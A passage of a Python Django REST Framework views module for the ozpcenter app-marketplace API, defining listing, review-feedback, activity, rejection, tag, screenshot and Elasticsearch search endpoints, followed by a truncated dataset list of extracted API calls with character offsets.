similar_listings = pipeline.Pipeline(recommend_utils.ListIterator(serializer.data),
[pipes.ListingDictPostSecurityMarkingCheckPipe(self.request.user.username),
pipes.LimitPipe(10)]).to_list()
return Response(similar_listings)
class RecommendationFeedbackViewSet(viewsets.ModelViewSet):
"""
Recommendation Feedback for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listing/{pk}/feedback
Summary:
Find a feedback Entry by ID
Response:
200 - Successful operation - ListingSerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.RecommendationFeedbackSerializer
# pagination_class = pagination.StandardPagination
def get_queryset(self, listing):
recommendation_feedback_query = model_access.get_recommendation_feedback(self.request.user.username, listing)
return recommendation_feedback_query
def list(self, request, listing_pk=None):
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
queryset = self.get_queryset(listing)
if not queryset:
return Response({'feedback': 0}, status=status.HTTP_404_NOT_FOUND)
serializer = serializers.RecommendationFeedbackSerializer(queryset, context={'request': request, 'listing': listing})
data = serializer.data
return Response(data)
def create(self, request, listing_pk=None):
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
serializer = serializers.RecommendationFeedbackSerializer(data=request.data, context={'request': request, 'listing': listing})
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def destroy(self, request, listing_pk=None, pk=None):
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
feedback = model_access.get_recommendation_feedback(request.user.username, listing)
if feedback is None:
return Response(status=status.HTTP_404_NOT_FOUND)
model_access.delete_recommendation_feedback(listing, feedback)
return Response(status=status.HTTP_204_NO_CONTENT)
class ListingTypeViewSet(viewsets.ModelViewSet):
"""
Listing Types
ModelViewSet for getting all Listing Types for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listingtype
Summary:
Get a list of all system-wide ListingType entries
Response:
200 - Successful operation - [ListingTypeSerializer]
POST /api/listingtype
Summary:
Add a ListingType
Request:
data: ListingTypeSerializer Schema
Response:
200 - Successful operation - ListingTypeSerializer
GET /api/listingtype/{pk}
Summary:
Find a ListingType Entry by ID
Response:
200 - Successful operation - ListingTypeSerializer
PUT /api/listingtype/{pk}
Summary:
Update a ListingType Entry by ID
PATCH /api/listingtype/{pk}
Summary:
Update (Partial) a ListingType Entry by ID
DELETE /api/listingtype/{pk}
Summary:
Delete a ListingType Entry by ID
"""
permission_classes = (permissions.IsUser,)
queryset = model_access.get_all_listing_types()
serializer_class = serializers.ListingTypeSerializer
class ListingUserActivitiesViewSet(viewsets.ModelViewSet):
"""
ListingUserActivitiesViewSet endpoints are read-only
ModelViewSet for getting all Listing User Activities for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/self/listings/activity
Summary:
Get a list of all system-wide ListingUserActivities entries
Response:
200 - Successful operation - [ListingActivitySerializer]
GET /api/self/listings/activity/{pk}
Summary:
Find a Listing User Activity Entry by ID
Response:
200 - Successful operation - ListingActivitySerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingActivitySerializer
def get_queryset(self):
return model_access.get_listing_activities_for_user(
self.request.user.username)
def list(self, request):
queryset = self.get_queryset()
page = self.paginate_queryset(queryset)
if page is not None:
serializer = serializers.ListingActivitySerializer(page,
context={'request': request}, many=True)
return self.get_paginated_response(serializer.data)
serializer = serializers.ListingActivitySerializer(queryset,
context={'request': request}, many=True)
return Response(serializer.data)
class ListingActivitiesViewSet(viewsets.ModelViewSet):
    """
    Read-only endpoints exposing the system-wide listing activity stream,
    newest first.

    Access Control
    ===============
    - AppsMallSteward can view

    URIs
    ======
    GET /api/listings/activity
    Summary:
        Get a list of all system-wide ListingActivities entries
    Response:
        200 - Successful operation - [ListingActivitySerializer]

    GET /api/listings/activity/{pk}
    Summary:
        Find a Listing User Activity Entry by ID
    Response:
        200 - Successful operation - ListingActivitySerializer
    """
    permission_classes = (permissions.IsOrgSteward,)
    serializer_class = serializers.ListingActivitySerializer

    def get_queryset(self):
        # Most recent activity first
        activities = model_access.get_all_listing_activities(
            self.request.user.username)
        return activities.order_by('-activity_date')

    def list(self, request):
        # Because we override the queryset, pagination must be driven manually
        activities = self.get_queryset()
        page = self.paginate_queryset(activities)
        if page is None:
            data = serializers.ListingActivitySerializer(
                activities, context={'request': request}, many=True).data
            return Response(data)
        data = serializers.ListingActivitySerializer(
            page, context={'request': request}, many=True).data
        return self.get_paginated_response(data)
class ListingActivityViewSet(viewsets.ModelViewSet):
    """
    Read-only endpoints exposing the activity stream for a single listing,
    newest first.

    Access Control
    ===============
    - All users can view

    URIs
    ======
    GET /api/listing/{pk}/activity
    Summary:
        Find a Listing Activity Entry by ID
    Response:
        200 - Successful operation - ListingActivitySerializer
    """
    permission_classes = (permissions.IsUser,)
    serializer_class = serializers.ListingActivitySerializer

    def get_queryset(self):
        # Most recent activity first
        activities = model_access.get_all_listing_activities(
            self.request.user.username)
        return activities.order_by('-activity_date')

    def list(self, request, listing_pk=None):
        # Because we override the queryset, pagination must be driven manually
        activities = self.get_queryset().filter(listing=listing_pk)
        page = self.paginate_queryset(activities)
        if page is None:
            data = serializers.ListingActivitySerializer(
                activities, context={'request': request}, many=True).data
            return Response(data)
        data = serializers.ListingActivitySerializer(
            page, context={'request': request}, many=True).data
        return self.get_paginated_response(data)

    def retrieve(self, request, pk=None, listing_pk=None):
        # Single activity entry, constrained to the listing in the URL
        activity = self.get_queryset().get(pk=pk, listing=listing_pk)
        data = serializers.ListingActivitySerializer(
            activity, context={'request': request}).data
        return Response(data)
class ListingPendingDeletionViewSet(viewsets.ModelViewSet):
    """
    ModelViewSet for getting all Listing Pending Deletions

    Access Control
    ===============
    - All users can view

    URIs
    ======
    POST /api/listing/{pk}/pendingdeletion
    Summary:
        Add a ListingPendingDeletion
    Request:
        data: ListingPendingDeletionSerializer Schema
    Response:
        200 - Successful operation - ListingActivitySerializer

    GET /api/listing/{pk}/pendingdeletion
    Summary:
        Find a ListingPendingDeletion Entry by ID
    Response:
        200 - Successful operation - ListingActivitySerializer
    """
    permission_classes = (permissions.IsUser,)
    serializer_class = serializers.ListingActivitySerializer

    def get_queryset(self):
        # Pending-deletion activities visible to the requesting user
        return model_access.get_pending_deletion_listings(
            self.request.user.username)

    def list(self, request, listing_pk=None):
        queryset = self.get_queryset().filter(listing__id=listing_pk)
        serializer = serializers.ListingActivitySerializer(queryset,
            context={'request': request}, many=True)
        return Response(serializer.data)

    def create(self, request, listing_pk=None):
        """
        Mark the listing identified by ``listing_pk`` as pending deletion.

        Raises:
            errors.InvalidInput: if no ``description`` is supplied.
            errors.RequestException: if the pending-deletion operation fails.
        """
        # Validate up front: this check previously lived inside the try
        # block, so the InvalidInput it raised was swallowed by the generic
        # Exception handler and clients only ever saw the vague
        # 'Error pending listing for deletion' message.
        description = request.data.get('description')
        if not description:
            raise errors.InvalidInput('Description is required when pending a listing for deletion')
        try:
            user = generic_model_access.get_profile(request.user.username)
            listing = model_access.get_listing_by_id(request.user.username,
                listing_pk)
            listing = model_access.pending_delete_listing(user, listing, description)
            return Response(data={"listing": {"id": listing.id}},
                status=status.HTTP_201_CREATED)
        except Exception as e:
            logger.error('Exception: {}'.format(e), extra={'request': request})
            # Chain the original exception for server-side diagnostics
            raise errors.RequestException('Error pending listing for deletion') from e
class ListingRejectionViewSet(viewsets.ModelViewSet):
    """
    ModelViewSet for getting all Listing Rejections

    Access Control
    ===============
    - AppsMallSteward can view

    URIs
    ======
    POST /api/listing/{pk}/rejection
    Summary:
        Add a ListingRejection
    Request:
        data: ListingRejectionSerializer Schema
    Response:
        200 - Successful operation - ListingActivitySerializer

    GET /api/listing/{pk}/rejection
    Summary:
        Find a ListingRejection Entry by ID
    Response:
        200 - Successful operation - ListingActivitySerializer
    """
    permission_classes = (permissions.IsOrgStewardOrReadOnly,)
    serializer_class = serializers.ListingActivitySerializer

    def get_queryset(self):
        # Rejection activities visible to the requesting user
        return model_access.get_rejection_listings(
            self.request.user.username)

    def list(self, request, listing_pk=None):
        queryset = self.get_queryset().filter(listing__id=listing_pk)
        serializer = serializers.ListingActivitySerializer(queryset,
            context={'request': request}, many=True)
        return Response(serializer.data)

    def create(self, request, listing_pk=None):
        """
        Reject the listing identified by ``listing_pk``.

        Raises:
            errors.InvalidInput: if no ``description`` is supplied.
            errors.RequestException: if the rejection operation fails.
        """
        # Validate up front: request.data['description'] previously raised a
        # KeyError inside the try block when the field was missing, which the
        # generic handler masked as 'Error rejecting listing'. This mirrors
        # the explicit validation done by ListingPendingDeletionViewSet.
        rejection_description = request.data.get('description')
        if not rejection_description:
            raise errors.InvalidInput('Description is required when rejecting a listing')
        try:
            user = generic_model_access.get_profile(request.user.username)
            listing = model_access.get_listing_by_id(request.user.username,
                listing_pk)
            listing = model_access.reject_listing(user, listing,
                rejection_description)
            return Response(data={"listing": {"id": listing.id}},
                status=status.HTTP_201_CREATED)
        except Exception as e:
            logger.error('Exception: {}'.format(e), extra={'request': request})
            # Chain the original exception for server-side diagnostics
            raise errors.RequestException('Error rejecting listing') from e
class ScreenshotViewSet(viewsets.ModelViewSet):
    """
    Standard CRUD endpoints over every Screenshot in the system.

    Access Control
    ===============
    - All users can view

    URIs
    ======
    GET /api/screenshot/
    Summary:
        Get a list of all system-wide Screenshot entries
    Response:
        200 - Successful operation - [ScreenshotSerializer]

    POST /api/screenshot/
    Summary:
        Add a Screenshot
    Request:
        data: ScreenshotSerializer Schema
    Response:
        200 - Successful operation - ScreenshotSerializer

    GET /api/screenshot/{pk}
    Summary:
        Find a Screenshot Entry by ID
    Response:
        200 - Successful operation - ScreenshotSerializer

    PUT /api/screenshot/{pk}
    Summary:
        Update a Screenshot Entry by ID

    PATCH /api/screenshot/{pk}
    Summary:
        Update (Partial) a Screenshot Entry by ID

    DELETE /api/screenshot/{pk}
    Summary:
        Delete a Screenshot Entry by ID
    """
    permission_classes = (permissions.IsUser,)
    serializer_class = serializers.ScreenshotSerializer
    queryset = model_access.get_all_screenshots()
class TagViewSet(viewsets.ModelViewSet):
    """
    Standard CRUD endpoints over every Tag in the system.

    Access Control
    ===============
    - All users can view

    URIs
    ======
    GET /api/tag/
    Summary:
        Get a list of all system-wide Tag entries
    Response:
        200 - Successful operation - [TagSerializer]

    POST /api/tag/
    Summary:
        Add a Tag
    Request:
        data: TagSerializer Schema
    Response:
        200 - Successful operation - TagSerializer

    GET /api/tag/{pk}
    Summary:
        Find a Tag Entry by ID
    Response:
        200 - Successful operation - TagSerializer

    PUT /api/tag/{pk}
    Summary:
        Update a Tag Entry by ID

    PATCH /api/tag/{pk}
    Summary:
        Update (Partial) a Tag Entry by ID

    DELETE /api/tag/{pk}
    Summary:
        Delete a Tag Entry by ID
    """
    permission_classes = (permissions.IsUser,)
    serializer_class = serializers.TagSerializer
    queryset = model_access.get_all_tags()
class ListingViewSet(viewsets.ModelViewSet):
    """
    Get all listings this user can see
    Listing Types
    ModelViewSet for getting all Listings
    Access Control
    ===============
    - All users can view
    URIs
    ======
    GET /api/listing
    Summary:
        Get a list of all system-wide Listings
    Response:
        200 - Successful operation - [ListingSerializer]
    POST /api/listing/
    Summary:
        Add a Listing
    Request:
        data: ListingSerializer Schema
    Response:
        200 - Successful operation - ListingSerializer
    GET /api/listing/{pk}
    Summary:
        Find a Listing Entry by ID
    Response:
        200 - Successful operation - ListingSerializer
    PUT /api/listing/{pk}
    Summary:
        Update a Listing Entry by ID
    PATCH /api/listing/{pk}
    Summary:
        Update (Partial) a Listing Entry by ID
    DELETE /api/listing/{pk}
    Summary:
        Delete a Listing Entry by ID
    """
    permission_classes = (permissions.IsUser,)
    serializer_class = serializers.ListingSerializer
    filter_backends = (filters.SearchFilter, filters.OrderingFilter)
    search_fields = ('title', 'id', 'owners__display_name', 'agency__title', 'agency__short_name',)
    ordering_fields = ('id', 'agency__title', 'agency__short_name', 'is_enabled', 'is_featured',
        'edited_date', 'security_marking', 'is_private', 'approval_status', 'approved_date',
        'avg_rate', 'total_votes')
    # Fields in this tuple are ordered case-insensitively by get_queryset
    # rather than by the (case-sensitive) OrderingFilter backend.
    case_insensitive_ordering_fields = ('title',)
    ordering = ('is_deleted', '-edited_date')

    def get_queryset(self):
        """
        Build the listing queryset from query-string parameters.

        Recognized parameters: ``approval_status``, ``org`` (repeatable),
        ``enabled`` ('true'/'1' => True, any other value => False),
        ``ordering`` (comma-separated field list), ``owners_id``.

        NOTE: when ordering on ``owners__display_name`` or on any field in
        ``case_insensitive_ordering_fields``, this method applies the
        ordering itself and sets ``self.ordering = None`` so the
        OrderingFilter backend does not re-sort (and, for multi-owner
        listings, duplicate) the results.
        """
        approval_status = self.request.query_params.get('approval_status', None)
        # org = self.request.query_params.get('org', None)
        orgs = self.request.query_params.getlist('org', False)
        enabled = self.request.query_params.get('enabled', None)
        ordering = self.request.query_params.get('ordering', None)
        owners_id = self.request.query_params.get('owners_id', None)
        if enabled:
            enabled = enabled.lower()
            if enabled in ['true', '1']:
                enabled = True
            else:
                enabled = False
        if ordering:
            ordering = [s.strip() for s in ordering.split(',')]
        else:
            # always default to last modified for consistency
            ordering = ['-edited_date']
        listings = model_access.get_listings(self.request.user.username)
        if owners_id:
            listings = listings.filter(owners__id=owners_id)
        if approval_status:
            listings = listings.filter(approval_status=approval_status)
        if orgs:
            listings = listings.filter(agency__short_name__in=orgs)
        if enabled is not None:
            listings = listings.filter(is_enabled=enabled)
        # have to handle this case manually because the ordering includes an app multiple times
        # if there are multiple owners. We instead do sorting by case insensitive compare of the
        # app owner that comes first alphabetically
        param = [s for s in ordering if 'owners__display_name' == s or '-owners__display_name' == s]
        if ordering is not None and param:
            orderby = 'min'
            if param[0].startswith('-'):
                orderby = '-min'
            listings = listings.annotate(min=Min(Lower('owners__display_name'))).order_by(orderby)
            self.ordering = None
        # Django REST filters are case sensitive by default, so we handle case_insensitive fields
        # manually. May want to abstract this functionality in an OrderingFilter sub-class
        case_insensitive_ordering = [s for s in ordering if s in self.case_insensitive_ordering_fields or
                                     s.startswith('-') and s[1:] in self.case_insensitive_ordering_fields]
        if ordering is not None and case_insensitive_ordering:
            for field in case_insensitive_ordering:
                if field.startswith('-'):
                    listings = listings.order_by(Lower(field[1:])).reverse()
                else:
                    listings = listings.order_by(Lower(field))
            self.ordering = None
        return listings

    def list(self, request):
        """List listings with eager-loaded relations plus aggregate counts."""
        queryset = serializers.ListingSerializer.setup_eager_loading(self.get_queryset())
        queryset = self.filter_queryset(queryset)
        counts_data = model_access.put_counts_in_listings_endpoint(queryset)
        # it appears that because we override the queryset here, we must
        # manually invoke the pagination methods
        page = self.paginate_queryset(queryset)
        if page is not None:
            serializer = serializers.ListingSerializer(page,
                context={'request': request}, many=True)
            r = self.get_paginated_response(serializer.data)
            # add counts to response (paginated response data is a dict)
            r.data['counts'] = counts_data
            return r
        serializer = serializers.ListingSerializer(queryset,
            context={'request': request}, many=True)
        r = Response(serializer.data)
        # add counts to response (unpaginated data is a list, so the counts
        # dict is appended as the final element)
        counts = {'counts': counts_data}
        r.data.append(counts)
        return r

    def create(self, request):
        """
        Save a new Listing - only title is required
        Sample Payload:
        {
           "title":"My Test App",
           "description":"This is the full description of my app",
           "descriptionShort":"short app description",
           "contacts":[
              {
                 "type":"Technical Support",
                 "name":"Tech Support Contact",
                 "organization":"ABC Inc",
                 "email":"<EMAIL>",
                 "securePhone":"555-555-5555",
                 "unsecurePhone":"111-222-3454"
              }
           ],
           "tags":[
              "tag1",
              "tag2"
           ],
           "type":"Web Application",
           "usage_requirements":"None",
           "system_requirements":"None",
           "versionName":"1.0.0",
           "launchUrl":"http://www.google.com/myApp",
           "whatIsNew":"Nothing is new",
           "owners":[
              {
                 "username":"alan"
              }
           ],
           "agency":"Test Organization",
           "categories":[
              "Entertainment",
              "Media and Video"
           ],
           "intents":[
              "application/json/edit",
              "application/json/view"
           ],
           "docUrls":[
              {
                 "name":"wiki",
                 "url":"http://www.wikipedia.com/myApp"
              }
           ],
           "smallIconId":"b0b54993-0668-4419-98e8-787e4c3a2dc2",
           "largeIconId":"e94128ab-d32d-4241-8820-bd2c69a64a87",
           "bannerIconId":"ecf79771-79a0-4884-a36d-5820c79c6d72",
           "featuredBannerIconId":"c3e6a369-4773-485e-b369-5cebaa331b69",
           "changeLogs":[
           ],
           "screenshots":[
              {
                 "smallImageId":"0b8db892-b669-4e86-af23-d899cb4d4d91",
                 "largeImageId":"80957d25-f34b-48bc-b860-b353cfd9e101"
              }
           ]
        }
        ---
        parameters:
            - name: body
              required: true
              paramType: body
        parameters_strategy:
            form: replace
            query: replace
        omit_serializer: true
        """
        # logger.debug('inside ListingViewSet.create', extra={'request': request})
        serializer = serializers.ListingSerializer(data=request.data,
            context={'request': request}, partial=True)
        if not serializer.is_valid():
            logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
            raise errors.ValidationException('{0}'.format(serializer.errors))
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)

    def retrieve(self, request, pk=None):
        """
        Get a Listing by id
        """
        queryset = self.get_queryset().get(pk=pk)
        serializer = serializers.ListingSerializer(queryset,
            context={'request': request})
        # TODO: Refactor in future to use django ordering (mlee)
        # Sort screenshots in-place by their 'order' key before returning
        temp = serializer.data.get('screenshots')
        temp.sort(key=operator.itemgetter('order'))
        return Response(serializer.data)

    def destroy(self, request, pk=None):
        """
        Delete a listing
        """
        queryset = self.get_queryset()
        listing = get_object_or_404(queryset, pk=pk)
        # A non-empty 'description' (reason for deletion) is mandatory
        description = request.data['description'] if 'description' in request.data else None
        if not description:
            raise errors.InvalidInput('Description is required when deleting a listing')
        model_access.delete_listing(request.user.username, listing, description)
        return Response(status=status.HTTP_204_NO_CONTENT)

    def update(self, request, pk=None):
        """
        Update a Listing
        Sample payload:
        {
           "id":45,
           "title":"My Test App",
           "description":"This is the full description of my app",
           "descriptionShort":"short app description",
           "contacts":[
              {
                 "securePhone":"555-555-5555",
                 "unsecurePhone":"111-222-3454",
                 "email":"<EMAIL>",
                 "organization":"ABC Inc",
                 "name":"Tech <NAME>",
                 "type":"Technical Support"
              }
           ],
           "totalReviews":0,
           "avgRate":0,
           "totalRate1":0,
           "totalRate2":0,
           "totalRate3":0,
           "totalRate4":0,
           "height":null,
           "width":null,
           "totalRate5":0,
           "totalVotes":0,
           "tags":[
              "tag2",
              "tag1"
           ],
           "type":"Web Application",
           "uuid":"e378c427-bba6-470c-b2f3-e550b9129504",
           "usage_requirements":"None",
           "system_requirements":"None",
           "iframe_compatible":false,
           "versionName":"1.0.0",
           "launchUrl":"http://www.google.com/myApp",
           "whatIsNew":"Nothing is new",
           "owners":[
              {
                 "displayName":"kevink",
                 "username":"kevink",
                 "id":5
              }
           ],
           "agency":"Test Organization",
           "agencyShort":"TO",
           "currentRejection":null,
           "isEnabled":true,
           "categories":[
              "Media and Video",
              "Entertainment"
           ],
           "editedDate":"2015-08-12T10:53:47.036+0000",
           "intents":[
              "application/json/edit",
              "application/json/view"
           ],
           "docUrls":[
              {
                 "url":"http://www.wikipedia.com/myApp",
                 "name":"wiki"
              }
           ],
           "approvalStatus":"IN_PROGRESS",
           "isFeatured":false,
           "smallIconId":"b0b54993-0668-4419-98e8-787e4c3a2dc2",
           "largeIconId":"e94128ab-d32d-4241-8820-bd2c69a64a87",
           "bannerIconId":"ecf79771-79a0-4884-a36d-5820c79c6d72",
           "featuredBannerIconId":"c3e6a369-4773-485e-b369-5cebaa331b69",
           "changeLogs":[
           ],
           "screenshots":[
              {
                 "largeImageId":"80957d25-f34b-48bc-b860-b353cfd9e101",
                 "smallImageId":"0b8db892-b669-4e86-af23-d899cb4d4d91"
              }
           ]
        }
        """
        # logger.debug('inside ListingViewSet.update', extra={'request': request})
        instance = self.get_queryset().get(pk=pk)
        serializer = serializers.ListingSerializer(instance, data=request.data, context={'request': request}, partial=True)
        # logger.debug('created ListingSerializer', extra={'request': request})
        if not serializer.is_valid():
            logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
            raise errors.ValidationException('{0}'.format(serializer.errors))
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)

    def partial_update(self, request, pk=None):
        """
        TODO: Probably don't use this (PATCH)
        """
        pass
class ListingUserViewSet(viewsets.ModelViewSet):
    """
    ModelViewSet exposing the listings owned by the requesting user.

    Access Control
    ===============
    - All users can view

    URIs
    ======
    GET /api/self/listing
    Summary:
        Get a list of all system-wide Listing User entries
    Response:
        200 - Successful operation - [ListingSerializer]

    GET /api/self/listing/{pk}
    Summary:
        Find a ListingUserViewSet Entry by ID
    Response:
        200 - Successful operation - ListingSerializer
    """
    permission_classes = (permissions.IsUser,)
    serializer_class = serializers.ListingSerializer

    def get_queryset(self):
        # Restrict to listings the requesting user owns
        return model_access.get_self_listings(self.request.user.username)

    def list(self, request):
        # Bug fix: previously this was ``super(...).list(self, request)``,
        # which passed the viewset instance as the ``request`` argument of
        # the already-bound super method (it only worked because DRF's
        # ListModelMixin reads ``self.request`` instead of its argument).
        return super(ListingUserViewSet, self).list(request)
class ListingSearchViewSet(viewsets.ModelViewSet):
    """
    Search for listings

    ModelViewSet for getting all Listing Searches

    Access Control
    ===============
    - All users can view

    URIs
    ======
    GET /api/listings/search
    Summary:
        Get a list of all system-wide Listing Search entries
    Response:
        200 - Successful operation - [ListingSerializer]

    GET /api/listings/search/{pk}
    Summary:
        Find a ListingSearchViewSet Entry by ID
    Response:
        200 - Successful operation - ListingSerializer
    """
    permission_classes = (permissions.IsUser,)
    serializer_class = serializers.ListingSerializer
    filter_backends = (filters.SearchFilter, )
    search_fields = ('title', 'description', 'description_short', 'tags__name')

    def get_queryset(self):
        """Collect repeatable filter params from the query string and delegate."""
        filter_params = {}
        categories = self.request.query_params.getlist('category', False)
        agencies = self.request.query_params.getlist('agency', False)
        listing_types = self.request.query_params.getlist('type', False)
        if categories:
            filter_params['categories'] = categories
        if agencies:
            filter_params['agencies'] = agencies
        if listing_types:
            filter_params['listing_types'] = listing_types
        return model_access.filter_listings(self.request.user.username,
            filter_params)

    def list(self, request):
        """
        ---
        # YAML (must be separated by `---`)
        omit_serializer: false
        parameters:
            - name: search
              description: Text to search
              paramType: query
            - name: category
              description: List of category names (AND logic)
              required: false
              paramType: query
              allowMultiple: true
            - name: agency
              description: List of agencies
              paramType: query
            - name: type
              description: List of application types
              paramType: query
            - name: limit
              description: Max number of listings to retrieve
              paramType: query
            - name: offset
              description: Offset
              paramType: query
        responseMessages:
            - code: 401
              message: Not authenticated
        """
        # Bug fix: previously this was ``super(...).list(self, request)``,
        # which passed the viewset instance as the ``request`` argument of
        # the already-bound super method.
        return super(ListingSearchViewSet, self).list(request)
class ElasticsearchListingSearchViewSet(viewsets.ViewSet):
    """
    Search listings via Elasticsearch.

    Supports pagination through ``offset``/``limit`` query parameters:

    GET /api/listings/essearch/?search=6&offset=0&limit=24 HTTP/1.1
    GET api/listings/essearch/?search=6&offset=0&category=Education&limit=24&type=web+application&agency=Minitrue&agency=Miniluv&minscore=0.4

    Only GET is supported; all mutating verbs raise NotImplemented.

    Access Control
    ===============
    - All users can view

    URIs
    ======
    GET /api/listings/essearch
    """
    permission_classes = (permissions.IsUser,)

    def list(self, request):
        """Run an Elasticsearch query built from the request's parameters."""
        username = request.user.username
        search_params = model_access_es.SearchParamParser(request)
        hits = model_access_es.search(username, search_params)
        return Response(hits, status=status.HTTP_200_OK)

    @list_route(methods=['get'], permission_classes=[permissions.IsUser])
    def suggest(self, request):
        """Return search-term suggestions for the request's parameters."""
        username = request.user.username
        search_params = model_access_es.SearchParamParser(self.request)
        suggestions = model_access_es.suggest(username, search_params)
        return Response(suggestions, status=status.HTTP_200_OK)

    def create(self, request):
        """Not supported for this endpoint."""
        raise errors.NotImplemented('HTTP Verb Not Supported')

    def retrieve(self, request, pk=None):
        """Not supported for this endpoint."""
        raise errors.NotImplemented('HTTP Verb Not Supported')

    def update(self, request, pk=None):
        """Not supported for this endpoint."""
        raise errors.NotImplemented('HTTP Verb Not Supported')

    def partial_update(self, request, pk=None):
        """Not supported for this endpoint."""
        raise errors.NotImplemented('HTTP Verb Not Supported')

    def destroy(self, request, pk=None):
        """Not supported for this endpoint."""
        raise errors.NotImplemented('HTTP Verb Not Supported')
| [
"ozpcenter.api.listing.model_access.put_counts_in_listings_endpoint",
"ozpcenter.api.listing.model_access.get_listing_by_id",
"ozpcenter.api.listing.model_access.get_all_listing_activities",
"ozpcenter.pipe.pipes.ListingDictPostSecurityMarkingCheckPipe",
"ozpcenter.api.listing.serializers.RecommendationFeed... | [((1026, 1057), 'ozpcenter.api.listing.model_access.get_all_doc_urls', 'model_access.get_all_doc_urls', ([], {}), '()\n', (1055, 1057), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((11090, 11126), 'ozpcenter.api.listing.model_access.get_all_listing_types', 'model_access.get_all_listing_types', ([], {}), '()\n', (11124, 11126), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((20774, 20808), 'ozpcenter.api.listing.model_access.get_all_screenshots', 'model_access.get_all_screenshots', ([], {}), '()\n', (20806, 20808), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((21816, 21843), 'ozpcenter.api.listing.model_access.get_all_tags', 'model_access.get_all_tags', ([], {}), '()\n', (21841, 21843), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((38587, 38655), 'rest_framework.decorators.list_route', 'list_route', ([], {'methods': "['get']", 'permission_classes': '[permissions.IsUser]'}), "(methods=['get'], permission_classes=[permissions.IsUser])\n", (38597, 38655), False, 'from rest_framework.decorators import list_route\n'), ((2279, 2331), 'ozpcenter.api.listing.model_access.get_reviews', 'model_access.get_reviews', (['self.request.user.username'], {}), '(self.request.user.username)\n', (2303, 2331), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((2908, 2987), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['queryset'], {'many': '(True)', 'context': "{'request': request}"}), "(queryset, many=True, context={'request': request})\n", (2936, 2987), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((3003, 3028), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (3011, 3028), False, 'from rest_framework.response import Response\n'), ((3180, 3248), 
'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['queryset'], {'context': "{'request': request}"}), "(queryset, context={'request': request})\n", (3208, 3248), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((3264, 3289), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (3272, 3289), False, 'from rest_framework.response import Response\n'), ((3409, 3480), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (3439, 3480), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((3503, 3618), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', ([], {'data': 'request.data', 'context': "{'request': request, 'listing': listing}", 'partial': '(True)'}), "(data=request.data, context={'request': request,\n 'listing': listing}, partial=True)\n", (3531, 3618), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((3861, 3918), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, status=status.HTTP_201_CREATED)\n', (3869, 3918), False, 'from rest_framework.response import Response\n'), ((4053, 4124), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (4083, 4124), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((4142, 4175), 'ozpcenter.api.listing.model_access.get_review_by_id', 'model_access.get_review_by_id', (['pk'], {}), '(pk)\n', (4171, 4175), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((4198, 4321), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['review'], 
{'data': 'request.data', 'context': "{'request': request, 'listing': listing}", 'partial': '(True)'}), "(review, data=request.data, context={'request':\n request, 'listing': listing}, partial=True)\n", (4226, 4321), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((4564, 4616), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_200_OK'}), '(serializer.data, status=status.HTTP_200_OK)\n', (4572, 4616), False, 'from rest_framework.response import Response\n'), ((4732, 4766), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['queryset'], {'pk': 'pk'}), '(queryset, pk=pk)\n', (4749, 4766), False, 'from django.shortcuts import get_object_or_404\n'), ((4775, 4840), 'ozpcenter.api.listing.model_access.delete_listing_review', 'model_access.delete_listing_review', (['request.user.username', 'review'], {}), '(request.user.username, review)\n', (4809, 4840), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((4856, 4899), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (4864, 4899), False, 'from rest_framework.response import Response\n'), ((6198, 6271), 'ozpcenter.api.listing.model_access.get_similar_listings', 'model_access.get_similar_listings', (['self.request.user.username', 'listing_pk'], {}), '(self.request.user.username, listing_pk)\n', (6231, 6271), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((7330, 7415), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request}, many=True\n )\n", (7359, 7415), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((7712, 7738), 'rest_framework.response.Response', 'Response', (['similar_listings'], {}), 